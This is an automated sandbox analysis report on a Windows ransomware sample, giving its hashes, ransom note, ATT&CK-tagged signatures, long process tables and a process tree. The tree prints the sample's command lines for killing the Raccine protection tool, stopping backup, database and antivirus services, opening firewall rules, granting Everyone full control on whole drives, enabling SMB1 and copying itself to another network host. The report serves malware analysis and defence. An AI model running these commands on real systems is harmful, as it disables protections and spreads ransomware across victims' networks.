1b8621d6e97ce87a8a5664699d285f417a5a08c40fb658aac9178dc5a6d4826c

Analysis

max time kernel
23s
max time network
156s
platform
windows10_x64
resource
win10v20210410
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
Size

108KB
MD5

f06010cbf89e396a78cebfd0456e1859
SHA1

33306e22ac0fa20a49cbbce252e08be91ac4414b
SHA256

5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4
SHA512

08d1aed5b3b797000fcf1005e5b3a4d991e0c68de0ec297238bc2822fe9d21d19d599f892aef7369cca8d2a5dca2dfac73fcf7441429153a66aa58a2039f1f29

Score

10^/10

discovery evasion ransomware trojan

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

Ransom Note

Don't worry, you can return all your files!! All your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. We also downloaded your corporate files (databases, tables, accounting information, etc.) and we will have to publish them if you do not agree to cooperation. To get this software you need write on our e-mail: [email protected] Key Identifier: Odey1WrF5Y4Qm1GLGN0yTSAemLyCk9z7x/dgNiPfbYN8yEJWMPUt6mqH9MSgz+0tb2KFmLwO6F1kD08GL4mbIVRu81aIkXW+ykD1k1AHbM9werCTSdOsEcuk/19WhZSEmnRIfVN+3+lvjNivt7wTVqNLBCDztCaihySvtyTFd71u6AfOjTdREogpPkGsx4IpvdBqCAP8WJ6x2TX7Syc1+YIOd8UXw4dgjqJgIdg06qEul5VE5rCsOqW6m+5EVCqvOjPwlK1GtPSn0zggeLXXZzy5xwMs2+bzDCm98ceXLdYaMVJudKd1nXYTOnPTQSEEiwFqMQlLtYpzYbuMqVdTbTzarVWtslxA3k9GTBol2ZSno9JE5ydFevId1plV1fQ67OZABKt8KzFld2UXU2BCtlP+C59iYFtWdTKhjmZjPErozpVypJnimgYvX8njn0M2Nkw4VqWKCboa7106XvNIJ2USVjYk4+6Q4pg+ruScaL6uMwE9nUHxGx66z0/ner3VQILyG856tX6oxJ9niwbphwNKxh58RDemQJvr44B46MnDJE37NMyElzMlQpa4AaW5rt/T6OaNneD7fiXuZdOSpfl6UxGzDq4JBs97Epg7k+FALgOZ2XcZV35jkUnQc6z1j97r89IcOucMcPqTb8hv/KmWlKiSylnHwhO+FYMMBcg=

Emails

[email protected]

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Downloads MZ/PE file
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Modifies file permissions 1 TTPs 9 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exe

pid process

12476 icacls.exe
11728 icacls.exe
7160
11828
14704
14292
4760 icacls.exe
6552
11148

pid	process
12476	icacls.exe
11728	icacls.exe
7160
11828
14704
14292
4760	icacls.exe
6552
11148

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Discovers systems in the same network 1 TTPs 1 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exe

pid process

16288 net.exe

pid	process
16288	net.exe

Kills process with taskkill 64 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
5612	taskkill.exe
15736
13544
12732
11496
9388	taskkill.exe
8164	taskkill.exe
11832	taskkill.exe
14260
13820
7988	taskkill.exe
10096
14044
9268
7220	taskkill.exe
5692
14600
7268
14604
5812
14148
9108
4292
15912
13548
12568
9372	taskkill.exe
9292	taskkill.exe
9236	taskkill.exe
13724
13736
9284	taskkill.exe
15588
12652
5148
7204	taskkill.exe
9244	taskkill.exe
7484	taskkill.exe
11756
8168
7416
8048
3756	taskkill.exe
4588	taskkill.exe
15104
8492
13812
4908
9348	taskkill.exe
4456	taskkill.exe
13080	taskkill.exe
15584
5432
5528
13224
9916
12540
9252	taskkill.exe
4000
11688
9340	taskkill.exe
9228	taskkill.exe
7372	taskkill.exe
7452	taskkill.exe

Modifies registry key 1 TTPs 3 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

1432 reg.exe
13512 reg.exe
8012
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

pid process

7016
Runs net.exe
Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery
T1018

Processes:

pid process

14824
4268
7520

pid	process
1432	reg.exe
13512	reg.exe
8012

pid	process
7016

pid	process
14824
4268
7520

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe

pid	process
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exepowershell.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
Token: SeDebugPrivilege	2024	powershell.exe
Token: SeDebugPrivilege	1508	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe

description	pid	process	target process
PID 4064 wrote to memory of 2024	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe	powershell.exe
PID 4064 wrote to memory of 2024	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe	powershell.exe
PID 4064 wrote to memory of 2024	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe	powershell.exe
PID 4064 wrote to memory of 1508	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe	taskkill.exe
PID 4064 wrote to memory of 1508	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe	taskkill.exe
PID 4064 wrote to memory of 1508	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe	taskkill.exe
PID 4064 wrote to memory of 3344	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe	reg.exe
PID 4064 wrote to memory of 3344	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe	reg.exe
PID 4064 wrote to memory of 3344	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe	reg.exe
PID 4064 wrote to memory of 1432	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 1432	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 1432	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 3488	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 3488	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 3488	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 2824	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 2824	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 2824	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 1392	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 1392	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 1392	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 2248	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 2248	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 2248	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 3264	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe	sc.exe
PID 4064 wrote to memory of 3264	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe	sc.exe
PID 4064 wrote to memory of 3264	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe	sc.exe
PID 4064 wrote to memory of 4116	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe	sc.exe
PID 4064 wrote to memory of 4116	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe	sc.exe
PID 4064 wrote to memory of 4116	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe	sc.exe
PID 4064 wrote to memory of 4148	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 4148	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 4148	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 4212	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 4212	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 4212	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 4240	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe	netsh.exe
PID 4064 wrote to memory of 4240	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe	netsh.exe
PID 4064 wrote to memory of 4240	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe	netsh.exe
PID 4064 wrote to memory of 4268	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 4268	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 4268	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 4300	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 4300	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 4300	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 4372	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 4372	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 4372	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 4404	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 4404	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 4404	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 4452	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 4452	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 4452	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 4496	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 4496	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 4496	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 4540	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 4540	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 4540	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 4584	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 4584	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 4584	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
PID 4064 wrote to memory of 4624	4064	5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe	net.exe

C:\Users\Admin\AppData\Local\Temp\5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe"
1⤵
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4064
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2024
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1508
- C:\Windows\SysWOW64\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:3344
- C:\Windows\SysWOW64\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:1432
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:1392
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:2248
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:3264
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:4116
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
  2⤵
  PID:4240
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  PID:4624
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  PID:4692
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop bedbg /y
  2⤵
  PID:4756
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop bedbg /y
    3⤵
    PID:4164
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:4828
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:4972
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$SQL_2008 /y
  2⤵
  PID:4360
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
    3⤵
    PID:5124
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$SQLEXPRESS /y
  2⤵
  PID:4204
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
    3⤵
    PID:5508
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:4748
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:8416
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$TPS /y
  2⤵
  PID:4896
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSSQL$TPS /y
    3⤵
    PID:8432
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop EPUpdateService /y
  2⤵
  PID:4932
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop EPUpdateService /y
    3⤵
    PID:8184
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:1560
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:10592
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:5172
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:11456
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamDeploySvc /y
  2⤵
  PID:5552
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploySvc /y
    3⤵
    PID:12808
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSExchangeSA /y
  2⤵
  PID:6712
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSExchangeSA /y
    3⤵
    PID:15160
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:8472
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop QBIDPService /y
    3⤵
    PID:15244
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  PID:8464
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop QBFCService /y
    3⤵
    PID:14744
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:8456
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop RTVscan /y
    3⤵
    PID:14272
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  PID:8448
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SavRoam /y
    3⤵
    PID:15356
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  PID:8440
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop ccSetMgr /y
    3⤵
    PID:15316
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  PID:7204
- C:\Windows\SysWOW64\icacls.exe
  "icacls" "D:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4760
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\10.10.0.30
  2⤵
  PID:14508
- C:\Users\Admin\AppData\Local\Temp\z0scf5zo.exe
  "C:\Users\Admin\AppData\Local\Temp\z0scf5zo.exe" \\10.10.0.30 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe"
  2⤵
  PID:5312
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c net view
  2⤵
  PID:13284
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
  2⤵
  PID:13276
- C:\Windows\SysWOW64\icacls.exe
  "icacls" "Z:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:12476
- C:\Windows\SysWOW64\icacls.exe
  "icacls" "C:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:11728
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
